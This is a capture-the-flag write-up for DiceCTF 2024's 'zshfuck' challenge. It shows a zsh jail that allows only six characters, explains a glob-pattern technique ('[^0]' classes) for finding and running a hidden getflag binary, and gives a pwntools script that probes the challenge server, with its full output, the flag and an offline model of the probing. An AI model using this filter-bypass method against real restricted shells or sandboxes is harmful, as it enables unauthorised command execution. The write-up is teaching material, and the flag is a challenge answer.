DiceCTF 2024 — zshfuck
may your code be under par. execute the getflag binary somewhere in the filesystem to win
nc mc.ax 31774
We're given a zsh script that looks like this:
Code (zsh):
#!/bin/zsh
print -n -P "%F{green}Specify your charset: %f"
read -r charset
# get uniq characters in charset
charset=("${(us..)charset}")
banned=('*' '?' '`')

if [[ ${#charset} -gt 6 || ${#charset:|banned} -ne ${#charset} ]]; then
    print -P "\n%F{red}That's too easy. Sorry.%f\n"
    exit 1
fi
print -P "\n%F{green}OK! Got $charset.%f"
charset+=($'\n')

# start jail via coproc
coproc zsh -s
exec 3>&p 4<&p

# read chars from fd 4 (jail stdout), print to stdout
while IFS= read -u4 -r -k1 char; do
    print -u1 -n -- "$char"
done &
# read chars from stdin, send to jail stdin if valid
while IFS= read -u0 -r -k1 char; do
    if [[ ! ${#char:|charset} -eq 0 ]]; then
        print -P "\n%F{red}Nope.%f\n"
        exit 1
    fi
    # send to fd 3 (jail stdin)
    print -u3 -n -- "$char"
done
We're asked for a "charset" of 6 unique characters, and given a shell where only those characters are allowed. *, ?, and ` are banned.
The key here is that we can use pattern matching with brackets to match characters one at a time. The directory the shell starts in contains
Code:
/app
 |--- run (the jail shell script)
 |--- y0u (the directory you want to search in)
which are both 3 characters long, so choose the character set
Code:
.[^0]/
and use 0 and [^0] to distinguish between the two: the pattern [^0]0[^0] matches y0u but not run.
Then, keep adding [^0]s to match characters, checking the return message in the shell to determine when to add a / to move down a directory. While the pattern is too short, zsh answers "no matches found"; once it answers anything else, the pattern has matched a whole name.
Here's a Python script to automate just that:
Code (python):
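import pwn

# the six allowed characters, followed by the newline that ends the prompt
charset = b'.[^0]/\n'
# pattern built so far; each round appends one more [^0]
cmd = './[^0]0[^0]/[^0][^0][^0][^0]/'

while True:
    # a fresh connection is opened for every attempt
    conn = pwn.remote('mc.ax', 31774)

    # consume the charset prompt, send the charset, skip the two reply lines
    conn.recv(numb=27)
    conn.send(charset)
    conn.recvline()
    conn.recvline()

    cmd += '[^0]'
    conn.send((cmd + '\n').encode())

    ret = conn.recvline().decode('utf8')
    print(ret)
    if ret.startswith('dice'):
        # the pattern matched the getflag binary and the flag was printed
        break
    elif not ret.startswith('zsh: no matches found:'):
        # the pattern matched a whole directory name: descend into it
        cmd += '/'

    conn.close()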
Code:
1[x] Opening connection to mc.ax on port 31774
2[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
3[+] Opening connection to mc.ax on port 31774: Done
4zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0]
5
6[*] Closed connection to mc.ax port 31774
7[x] Opening connection to mc.ax on port 31774
8[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
9[+] Opening connection to mc.ax on port 31774: Done
10zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0]
11
12[*] Closed connection to mc.ax port 31774
13[x] Opening connection to mc.ax on port 31774
14[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
15[+] Opening connection to mc.ax on port 31774: Done
16zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0]
17
18[*] Closed connection to mc.ax port 31774
19[x] Opening connection to mc.ax on port 31774
20[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
21[+] Opening connection to mc.ax on port 31774: Done
22zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0]
23
24[*] Closed connection to mc.ax port 31774
25[x] Opening connection to mc.ax on port 31774
26[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
27[+] Opening connection to mc.ax on port 31774: Done
28zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0]
29
30[*] Closed connection to mc.ax port 31774
31[x] Opening connection to mc.ax on port 31774
32[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
33[+] Opening connection to mc.ax on port 31774: Done
34zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0]
35
36[*] Closed connection to mc.ax port 31774
37[x] Opening connection to mc.ax on port 31774
38[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
39[+] Opening connection to mc.ax on port 31774: Done
40zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0]
41
42[*] Closed connection to mc.ax port 31774
43[x] Opening connection to mc.ax on port 31774
44[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
45[+] Opening connection to mc.ax on port 31774: Done
46zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0]
47
48[*] Closed connection to mc.ax port 31774
49[x] Opening connection to mc.ax on port 31774
50[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
51[+] Opening connection to mc.ax on port 31774: Done
52zsh: permission denied: ./y0u/w1ll/n3v3r_g3t
53
54[*] Closed connection to mc.ax port 31774
55[x] Opening connection to mc.ax on port 31774
56[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
57[+] Opening connection to mc.ax on port 31774: Done
58zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0]
59
60[*] Closed connection to mc.ax port 31774
61[x] Opening connection to mc.ax on port 31774
62[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
63[+] Opening connection to mc.ax on port 31774: Done
64zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0]
65
66[*] Closed connection to mc.ax port 31774
67[x] Opening connection to mc.ax on port 31774
68[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
69[+] Opening connection to mc.ax on port 31774: Done
70zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0]
71
72[*] Closed connection to mc.ax port 31774
73[x] Opening connection to mc.ax on port 31774
74[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
75[+] Opening connection to mc.ax on port 31774: Done
76zsh: permission denied: ./y0u/w1ll/n3v3r_g3t/th1s
77
78[*] Closed connection to mc.ax port 31774
79[x] Opening connection to mc.ax on port 31774
80[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
81[+] Opening connection to mc.ax on port 31774: Done
82zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0]
83
84[*] Closed connection to mc.ax port 31774
85[x] Opening connection to mc.ax on port 31774
86[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
87[+] Opening connection to mc.ax on port 31774: Done
88zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0]
89
90[*] Closed connection to mc.ax port 31774
91[x] Opening connection to mc.ax on port 31774
92[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
93[+] Opening connection to mc.ax on port 31774: Done
94zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0]
95
96[*] Closed connection to mc.ax port 31774
97[x] Opening connection to mc.ax on port 31774
98[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
99[+] Opening connection to mc.ax on port 31774: Done
100zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0]
101
102[*] Closed connection to mc.ax port 31774
103[x] Opening connection to mc.ax on port 31774
104[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
105[+] Opening connection to mc.ax on port 31774: Done
106zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0]
107
108[*] Closed connection to mc.ax port 31774
109[x] Opening connection to mc.ax on port 31774
110[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
111[+] Opening connection to mc.ax on port 31774: Done
112zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0]
113
114[*] Closed connection to mc.ax port 31774
115[x] Opening connection to mc.ax on port 31774
116[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
117[+] Opening connection to mc.ax on port 31774: Done
118dice{d0nt_u_jU5T_l00oo0ve_c0d3_g0lf?}
119
120[*] Closed connection to mc.ax port 31774
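An offline model of the probing loop above, added here as an illustration and not part of the original write-up. It shows why the six-character allow-list does not limit which paths can be named: the difference between zsh's "no matches found" and "permission denied" replies gives away the length of each directory name. `TREE`, the placeholder flag, and the helper names `charset_ok`, `expand`, `jail_reply` and `probe` are constructed for this example.

```python
import re

# Constructed copy of the layout the page's output reveals; leaves hold the
# text a file prints when executed. The flag value is a placeholder.
TREE = {'run': 'jail script',
        'y0u': {'w1ll': {'n3v3r_g3t': {'th1s': {'getflag': 'FLAG{constructed}'}}}}}
BANNED = set('*?`')

def charset_ok(charset):
    """The jail's up-front check: at most 6 unique characters, none banned."""
    uniq = set(charset)
    return len(uniq) <= 6 and not (uniq & BANNED)

def expand(cmd, tree):
    """Expand a './a/b' glob against TREE. A zsh [^0] class has the same
    meaning as the regex [^0], so each component is used as a regex."""
    hits = [('.', tree)]
    for comp in cmd.split('/')[1:]:
        rx = re.compile(comp.replace('.', r'\.'))
        hits = [(f'{path}/{name}', kid)
                for path, node in hits if isinstance(node, dict)
                for name, kid in sorted(node.items()) if rx.fullmatch(name)]
    return hits

def jail_reply(cmd, tree):
    """Model the three replies the page's script tells apart."""
    hits = expand(cmd, tree)
    if not hits:
        return f'zsh: no matches found: {cmd}'
    path, node = hits[0]
    if isinstance(node, dict):           # a directory cannot be executed
        return f'zsh: permission denied: {path}'
    return node                          # a file: its output

def probe(tree, charset='.[^0]/', start='./[^0]0[^0]/', limit=200):
    """Replay the page's loop offline; returns (command, reply, attempts)."""
    assert charset_ok(charset)
    cmd = start
    for attempt in range(1, limit + 1):
        cmd += '[^0]'
        assert set(cmd) <= set(charset)  # the per-character filter passes
        reply = jail_reply(cmd, tree)
        if reply.startswith('zsh: permission denied:'):
            cmd += '/'                   # whole directory name matched
        elif not reply.startswith('zsh: no matches found:'):
            return cmd, reply, attempt
    raise RuntimeError('no executable found within limit')

if __name__ == '__main__':
    print(probe(TREE))
```

Every command `probe` builds passes the jail's per-character filter, which is why a check on the glob metacharacters themselves would be needed to close this path.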